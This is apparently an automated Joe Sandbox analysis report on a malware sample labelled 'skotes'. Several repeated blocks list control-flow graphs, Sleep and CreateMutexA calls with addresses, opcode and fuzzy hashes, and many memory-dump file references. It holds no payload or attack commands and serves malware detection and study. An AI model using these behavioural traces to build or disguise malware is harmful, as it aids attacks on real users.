                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 94e55281f4ff3d24b2a54bfa67ad8aea0bb56494e969dcb551db511a162c31d9
                                                                                                                                                                                                                                              • Instruction ID: bb7ce974f4129ff9dca19b6b76ad485a7f654ea0be9b712f7be9f41f287f071d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94e55281f4ff3d24b2a54bfa67ad8aea0bb56494e969dcb551db511a162c31d9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C93128317001408BFB08DF78ECD97ADF7E6EB96314F24829AE414973D1E7B999808766

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 202 bda682-bda6a2 206 bda6a4-bda6b0 202->206 207 bda6d0-bda6ec 202->207 208 bda6c6-bda6cd call bed663 206->208 209 bda6b2-bda6c0 206->209 210 bda6ee-bda6fa 207->210 211 bda71a-bda739 207->211 208->207 209->208 214 bda949 209->214 216 bda6fc-bda70a 210->216 217 bda710-bda717 call bed663 210->217 212 bda73b-bda747 211->212 213 bda767-bda916 call be80c0 211->213 219 bda75d-bda764 call bed663 212->219 220 bda749-bda757 212->220 221 bda94e 214->221 222 bda949 call c06c6a 214->222 216->214 216->217 217->211 219->213 220->214 220->219 228 bda953-bda994 Sleep CreateMutexA 221->228 229 bda94e call c06c6a 221->229 222->221 234 bda9a7-bda9a8 228->234 235 bda996-bda998 228->235 229->228 235->234 236 bda99a-bda9a5 235->236 236->234
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 6313ce1fb57cd353c78a164df5aa8fd0d5480a4c90e49b29a077d5305ae02b6f
                                                                                                                                                                                                                                              • Instruction ID: e5f5a1ce5234c7bed6ec785ae9b083150d5d58bf860ab6e741ce5942f1dba53b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6313ce1fb57cd353c78a164df5aa8fd0d5480a4c90e49b29a077d5305ae02b6f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83312A317002409BFB08DF78DCD97AEF7E6DB86310F24869AE014973D5E7B999808766

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 238 bd9adc-bd9ae8 239 bd9afe-bd9b27 call bed663 238->239 240 bd9aea-bd9af8 238->240 247 bd9b29-bd9b35 239->247 248 bd9b55-bd9b57 239->248 240->239 241 bda917 240->241 244 bda953-bda994 Sleep CreateMutexA 241->244 245 bda917 call c06c6a 241->245 254 bda9a7-bda9a8 244->254 255 bda996-bda998 244->255 245->244 250 bd9b4b-bd9b52 call bed663 247->250 251 bd9b37-bd9b45 247->251 252 bd9b59-bda916 call be80c0 248->252 253 bd9b65-bd9d91 call be7a00 call bd5c10 call bd8b30 call be8220 call be7a00 call bd5c10 call bd8b30 call be8220 248->253 250->248 251->241 251->250 255->254 256 bda99a-bda9a5 255->256 256->254
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: ffaaa1cb4e05ca328e2247b1cf349c45209b5f722f7f8cf4aa475238e9a8f255
                                                                                                                                                                                                                                              • Instruction ID: 77039b9b444ae5a4d8c7516f638182256832e22b71f1ee0f69fb862a1af3b039
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffaaa1cb4e05ca328e2247b1cf349c45209b5f722f7f8cf4aa475238e9a8f255
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD2129317142409BFB189F68ECD97ADF7E1EBD2310F20429AF418973D5E7BA99808751

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 315 bda856-bda86e 316 bda89c-bda89e 315->316 317 bda870-bda87c 315->317 320 bda8a9-bda8b1 call bd7d30 316->320 321 bda8a0-bda8a7 316->321 318 bda87e-bda88c 317->318 319 bda892-bda899 call bed663 317->319 318->319 322 bda94e 318->322 319->316 332 bda8e4-bda8e6 320->332 333 bda8b3-bda8bb call bd7d30 320->333 324 bda8eb-bda916 call be80c0 321->324 329 bda953-bda987 Sleep CreateMutexA 322->329 330 bda94e call c06c6a 322->330 335 bda98e-bda994 329->335 330->329 332->324 333->332 340 bda8bd-bda8c5 call bd7d30 333->340 337 bda9a7-bda9a8 335->337 338 bda996-bda998 335->338 338->337 339 bda99a-bda9a5 338->339 339->337 340->332 344 bda8c7-bda8cf call bd7d30 340->344 344->332 347 bda8d1-bda8d9 call bd7d30 344->347 347->332 350 bda8db-bda8e2 347->350 350->324
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183298522.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183323287.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183337101.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183349265.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183362592.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183448160.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183462698.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183480656.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183493828.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183532091.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183543836.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183557679.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183570847.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183588010.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183601098.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183613091.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183655100.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183666981.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183679723.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183691415.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183704714.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183718528.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183731288.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183743704.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183757632.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183770268.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183791695.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183805801.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183818899.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183833396.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183846914.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183859103.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183873159.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183884988.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183921886.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183940513.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183959130.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183973738.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183986076.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184002179.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184014073.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184027530.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2184061928.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 93ff5e6d736ca1f0ada54f4469da89b07d7f7a4c3b60035bb8fcb7cf8df19105
                                                                                                                                                                                                                                              • Instruction ID: 0328d914c3b4cbca972230a16290eaf2a3de37d2549d6fce6e75122960e7a55d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93ff5e6d736ca1f0ada54f4469da89b07d7f7a4c3b60035bb8fcb7cf8df19105
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D2100713552419BFB24576898DA76EF3D2DF81700F2444E7E804963D1FBBB45819193

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 292 bda34f-bda35b 293 bda35d-bda36b 292->293 294 bda371-bda39a call bed663 292->294 293->294 295 bda93a 293->295 300 bda39c-bda3a8 294->300 301 bda3c8-bda916 call be80c0 294->301 297 bda953-bda994 Sleep CreateMutexA 295->297 298 bda93a call c06c6a 295->298 308 bda9a7-bda9a8 297->308 309 bda996-bda998 297->309 298->297 302 bda3be-bda3c5 call bed663 300->302 303 bda3aa-bda3b8 300->303 302->301 303->295 303->302 309->308 310 bda99a-bda9a5 309->310 310->308
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183241564.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.2183253576.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
